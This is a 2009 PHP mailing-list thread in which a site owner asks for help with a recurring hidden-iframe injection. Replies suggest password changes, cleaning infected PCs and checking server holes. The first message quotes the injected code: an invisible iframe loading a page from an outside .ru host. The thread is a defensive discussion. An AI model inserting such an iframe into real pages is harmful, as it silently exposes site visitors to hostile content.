Loading ...
Sorry, an error occurred while loading the content.

about an attack

Expand Messages
  • Tapan
    hi exparts, hope u all fine. but i am suffering by an attack. let me explain the problem. whenever i upload a clean index file to the host, it stay ok for some
    Message 1 of 9 , Jul 30, 2009
    • 0 Attachment
      hi exparts,
      hope u all fine. but i am suffering by an attack.

      let me explain the problem. whenever i upload a clean index file to the host, it stay ok for some time but after a certain period i found that after the <body> tag there is a ifram tag included, i dont know how.

      <iframe src="http://xq9.ru:8080/index.php" width=192 height=173 style="visibility: hidden"></iframe>

      this is the code. for this my total site is down to 173 px from top.

      what is your experience about it exparts???pls help me regarding this issue.

      thanks in advance
      Tapan
    • Lenin
      Change all your FTP and hosting login passwords. There are some virus which uses your FTP client while transferring the files to your host. Clean your machine
      Message 2 of 9 , Jul 30, 2009
      • 0 Attachment
        Change all your FTP and hosting login passwords. There are some virus which uses your FTP client while transferring the files to your host.

        Clean your machine from where you upload the files. The attack is through the socket. Or, password stealer.
      • shiplu
        ... Do you upload any clean index.html or index.php file?? Is it a cms? ... -- A K M Mokaddim http://talk.cmyweb.net http://twitter.com/shiplu Stop Top Posting
        Message 3 of 9 , Jul 30, 2009
        • 0 Attachment
          On Thu, Jul 30, 2009 at 2:46 PM, Tapan<tapan29bd@...> wrote:
          > hi exparts,
          > hope u all fine. but i am suffering by an attack.
          >
          > let me explain the problem. whenever i upload a clean index file to the host, it stay ok for some time but after a certain period i found that after the <body> tag there is a ifram tag included, i dont know how.
          Do you upload any clean index.html or index.php file??
          Is it a cms?

          >
          >



          --
          A K M Mokaddim
          http://talk.cmyweb.net
          http://twitter.com/shiplu
          Stop Top Posting !!
          বাংলিশ লেখার চাইতে বাংলা লেখা অনেক ভাল
          Sent from Dhaka, Bangladesh
        • Enayet Husain
          Hi, What is the most effective antivirus to remove these malware/ virus. I am using AVIRA. Not bad. It can also track the iframe code in html/php files. Thank
          Message 4 of 9 , Jul 30, 2009
          • 0 Attachment
            Hi,

            What is the most effective antivirus to remove these malware/ virus.

            I am using AVIRA. Not bad. It can also track the iframe code in html/php files.


            Thank you,
            Enayet




            contact@...
            www.enayet.net
            www.rajibsl.com


            --- On Thu, 7/30/09, Lenin <lenin@...> wrote:

            From: Lenin <lenin@...>
            Subject: Re: [phpXperts] about an attack
            To: phpexperts@yahoogroups.com
            Date: Thursday, July 30, 2009, 9:03 AM

             

            Change all your FTP and hosting login passwords. There are some virus which uses your FTP client while transferring the files to your host.

            Clean your machine from where you upload the files. The attack is through the socket. Or, password stealer.


          • Raisul Kabir
            There is a high possibility it might not be a virus. It might be a security hole of apache or php which is exposing ftp un/pw and through which it got access
            Message 5 of 9 , Aug 3, 2009
            • 0 Attachment
              There is a high possibility it might not be a virus. It might be a security hole of apache or php which is exposing ftp un/pw and through which it got access to all the files. Let your hosting company know about the problem, change password and upload clean file. Please note that, changing password is a required thing, it's above everything else. Because, there is some sort of bot continously changing your files, only way to prevent it changing the password first.

              I had this attack few days earlier and continuously was changing files. I formatted my PC and yet no affect. But, after changing password there was no attack. Same happened for couple of others sites for me and some other friends of mine. So far I didn't see this attack in any windows server, so there is possibility it might be apache's or linux's bug.

              Raisul


              --------------------
              Raisul Kabir, CTO, BrainStation-23
              H-480, R-32, Mohakhali, New DOHS,
              Dhaka, Bangladesh
              cell: +8801713458492
              email: raisul@... raisulk@... raisul@...
              skype: raisulk gtalk: raisulk


              On Thu, Jul 30, 2009 at 5:51 PM, Enayet Husain <eh_rajib@...> wrote:
               

              Hi,

              What is the most effective antivirus to remove these malware/ virus.

              I am using AVIRA. Not bad. It can also track the iframe code in html/php files.


              Thank you,
              Enayet




              contact@...
              www.enayet.net
              www.rajibsl.com


              --- On Thu, 7/30/09, Lenin <lenin@...> wrote:

              From: Lenin <lenin@...>
              Subject: Re: [phpXperts] about an attack
              To: phpexperts@yahoogroups.com
              Date: Thursday, July 30, 2009, 9:03 AM


               

              Change all your FTP and hosting login passwords. There are some virus which uses your FTP client while transferring the files to your host.

              Clean your machine from where you upload the files. The attack is through the socket. Or, password stealer.



            • Lenin
              ... Anything it maybe, but we should be well aware of common security flaws there might be. And if a key of a lock is stolen or found to be cloned, we should
              Message 6 of 9 , Aug 3, 2009
              • 0 Attachment
                On Tue, Aug 4, 2009 at 11:32 AM, Raisul Kabir <raisulk@...> wrote:


                There is a high possibility it might not be a virus. It might be a security hole of apache or php which is exposing ftp un/pw and through which it got access to all the files. Let your hosting company know about the problem, change password and upload clean file. Please note that, changing password is a required thing, it's above everything else. Because, there is some sort of bot continously changing your files, only way to prevent it changing the password first.

                Anything it maybe, but we should be well aware of common security flaws there might be. And if a key of a lock is stolen or found to be cloned, we should change the lock.


                I had this attack few days earlier and continuously was changing files. I formatted my PC and yet no affect. But, after changing password there was no attack. Same happened for couple of others sites for me and some other friends of mine. So far I didn't see this attack in any windows server, so there is possibility it might be apache's or linux's bug.

                Well, concluding that it might be a Linux's bug is too early in my consideration. Because, there's no such buzz yet about it. And depending upon your own experience could be a biased one. To be sure it was not a virus or worm which utilizes the socket or any other method your developing machine could be a linux(eliminating prior chances to let virus in your local machine).

                As a part of security, you should always be changing your important passwords.
              • Sabuj Kundu
                Dear Raisul, heh heh so many might be .... ok leave this. In my experience I didn t work in any live windows server yet. I think maximum server is more
                Message 7 of 9 , Aug 3, 2009
                • 0 Attachment
                  Dear  Raisul,

                  heh heh so many "might be".... ok leave this. In my experience I didn't work in any live windows server yet. I think maximum server is more secure because they host so many sites and if this happen to one site then same will be with all.

                  I had two type of experience:

                  One:

                  I think max developer use ftp manager like filezilla or others(max hosting doesn't allow ssh for shared account). If you check how filezilla saves password... it uses just  a xml file. so it's not hard to make a virus to check steal password from that file. If you pc is not securd I mean no antivirus but using windows (:P)  then it may happen that , that virus can steal password and rest is what is see. Yes, this happened to one of my client. At first uploaded from my localhost to live and there was no problem with iframe attack or this type of attack. then when the client uploaded file from his computer the site was affected and I checked his computer was full of virus.


                  One: All sites of same client got affected. This time I should say there may be server issue too. Once same thing happened to one of my client. All the file upload things was done by me(I am using windows and filezilla) but his 4/5 sites all were affected. That was informed to the hosting company but they didn't respond this time, We changed hosting and that didn't happen again.

                  hei , apache's or linux's bug    don't you think, that that is a funny and weightless comment. If there any such bug in apache(I am not saying there is no bug) then all hosting company should run for food same time and linux's bug ??? is linux a single software ?


                  thanks.

                  ........................
                  Sabuj Kumar Kundu
                  About Me: http://blog.manchumahara.com/about/
                  http:/blog.manchumahara.com
                  http://forum.amaderprojukti.com
                  http://gallery.amaderprojukti.com
                  http://mkabya.page.tl



                  On Tue, Aug 4, 2009 at 11:32 AM, Raisul Kabir <raisulk@...> wrote:
                   

                  There is a high possibility it might not be a virus. It might be a security hole of apache or php which is exposing ftp un/pw and through which it got access to all the files. Let your hosting company know about the problem, change password and upload clean file. Please note that, changing password is a required thing, it's above everything else. Because, there is some sort of bot continously changing your files, only way to prevent it changing the password first.

                  I had this attack few days earlier and continuously was changing files. I formatted my PC and yet no affect. But, after changing password there was no attack. Same happened for couple of others sites for me and some other friends of mine. So far I didn't see this attack in any windows server, so there is possibility it might be apache's or linux's bug.

                  Raisul


                  --------------------
                  Raisul Kabir, CTO, BrainStation-23
                  H-480, R-32, Mohakhali, New DOHS,
                  Dhaka, Bangladesh
                  cell: +8801713458492
                  email: raisul@... raisulk@... raisul@...
                  skype: raisulk gtalk: raisulk




                • Raisul Kabir
                  I have reasons to believe it s a hole in apache, because apache mailing list is the only place where I got mention about this iframe attack. There were two
                  Message 8 of 9 , Aug 5, 2009
                  • 0 Attachment
                    I have reasons to believe it's a hole in apache, because apache mailing list is the only place where I got mention about this iframe attack.

                    There were two iframe attacks. One was from own PC, which happened around 2-3 years back. Another is the recent one which started since April. May be your experience was with a client who was affected with the 1st type of virus. It affects the local PCs files. The recent one is not yet reported to be caught by any virus scaner till now.

                    At first I thought it was a virus from my PC which was doing so. I formatted my PC and still it was happening. Some passwords I even didn't have which client requested that they were affected. Of course client can be tricked by the virus as well. But too many co-incidences. Also, if it was virus from my PC, then changing password should not make any difference. But, it made difference.

                    Then I thought it was bug in my coding style. But I found couple of wordpress, Joomla and other html sites were affected. And not only me, many other friend's sites were affected. So, it is definitely not PHP coding.

                    Good news for CI devs - no CI site was affected. It's because, this bot searches for only index/home ... this sort of common php and html files. CI has only index. Then in that file, it searches for <body> tag, sometimes it enters after body sometimes it enters after html tag ending. CI index page has none (since it takes them from view). So, no CI site was affected.

                    I don't have very good understanding about apache variables. But I found in apache mailing list that, keeping something open might create a hole which will expose the password. It's not exactly a bug, sort of potential security hole, something like php's register global.

                    Best regards.

                    Raisul



                    On Tue, Aug 4, 2009 at 12:10 PM, Sabuj Kundu <manchumahara@...> wrote:
                     

                    Dear  Raisul,

                    heh heh so many "might be".... ok leave this. In my experience I didn't work in any live windows server yet. I think maximum server is more secure because they host so many sites and if this happen to one site then same will be with all.

                    I had two type of experience:

                    One:

                    I think max developer use ftp manager like filezilla or others(max hosting doesn't allow ssh for shared account). If you check how filezilla saves password... it uses just  a xml file. so it's not hard to make a virus to check steal password from that file. If you pc is not securd I mean no antivirus but using windows (:P)  then it may happen that , that virus can steal password and rest is what is see. Yes, this happened to one of my client. At first uploaded from my localhost to live and there was no problem with iframe attack or this type of attack. then when the client uploaded file from his computer the site was affected and I checked his computer was full of virus.


                    One: All sites of same client got affected. This time I should say there may be server issue too. Once same thing happened to one of my client. All the file upload things was done by me(I am using windows and filezilla) but his 4/5 sites all were affected. That was informed to the hosting company but they didn't respond this time, We changed hosting and that didn't happen again.

                    hei , apache's or linux's bug    don't you think, that that is a funny and weightless comment. If there any such bug in apache(I am not saying there is no bug) then all hosting company should run for food same time and linux's bug ??? is linux a single software ?


                    thanks.

                    ........................
                    Sabuj Kumar Kundu
                    About Me: http://blog.manchumahara.com/about/
                    http:/blog.manchumahara.com
                    http://forum.amaderprojukti.com
                    http://gallery.amaderprojukti.com
                    http://mkabya.page.tl



                    On Tue, Aug 4, 2009 at 11:32 AM, Raisul Kabir <raisulk@...> wrote:
                     

                    There is a high possibility it might not be a virus. It might be a security hole of apache or php which is exposing ftp un/pw and through which it got access to all the files. Let your hosting company know about the problem, change password and upload clean file. Please note that, changing password is a required thing, it's above everything else. Because, there is some sort of bot continously changing your files, only way to prevent it changing the password first.

                    I had this attack few days earlier and continuously was changing files. I formatted my PC and yet no affect. But, after changing password there was no attack. Same happened for couple of others sites for me and some other friends of mine. So far I didn't see this attack in any windows server, so there is possibility it might be apache's or linux's bug.

                    Raisul


                    --------------------
                    Raisul Kabir, CTO, BrainStation-23
                    H-480, R-32, Mohakhali, New DOHS,
                    Dhaka, Bangladesh
                    cell: +8801713458492
                    email: raisul@... raisulk@... raisul@...
                    skype: raisulk gtalk: raisulk





                  • Raisul Kabir
                    You are right Lenin bhai. My mistake, please ignore my conclusion about Linux, most of my php sites are hosted in Linux, very few were in windows. So, no
                    Message 9 of 9 , Aug 5, 2009
                    • 0 Attachment
                      You are right Lenin bhai. My mistake, please ignore my conclusion about Linux, most of my php sites are hosted in Linux, very few were in windows. So, no conclusion can be drawn from there, you are right.
                      But, all the asp.net applications were in windows and none were affected.

                      Raisul


                      On Tue, Aug 4, 2009 at 12:01 PM, Lenin <lenin@...> wrote:
                       

                      On Tue, Aug 4, 2009 at 11:32 AM, Raisul Kabir <raisulk@...> wrote:


                      There is a high possibility it might not be a virus. It might be a security hole of apache or php which is exposing ftp un/pw and through which it got access to all the files. Let your hosting company know about the problem, change password and upload clean file. Please note that, changing password is a required thing, it's above everything else. Because, there is some sort of bot continously changing your files, only way to prevent it changing the password first.

                      Anything it maybe, but we should be well aware of common security flaws there might be. And if a key of a lock is stolen or found to be cloned, we should change the lock.


                      I had this attack few days earlier and continuously was changing files. I formatted my PC and yet no affect. But, after changing password there was no attack. Same happened for couple of others sites for me and some other friends of mine. So far I didn't see this attack in any windows server, so there is possibility it might be apache's or linux's bug.

                      Well, concluding that it might be a Linux's bug is too early in my consideration. Because, there's no such buzz yet about it. And depending upon your own experience could be a biased one. To be sure it was not a virus or worm which utilizes the socket or any other method your developing machine could be a linux(eliminating prior chances to let virus in your local machine).

                      As a part of security, you should always be changing your important passwords.

                    Your message has been successfully submitted and would be delivered to recipients shortly.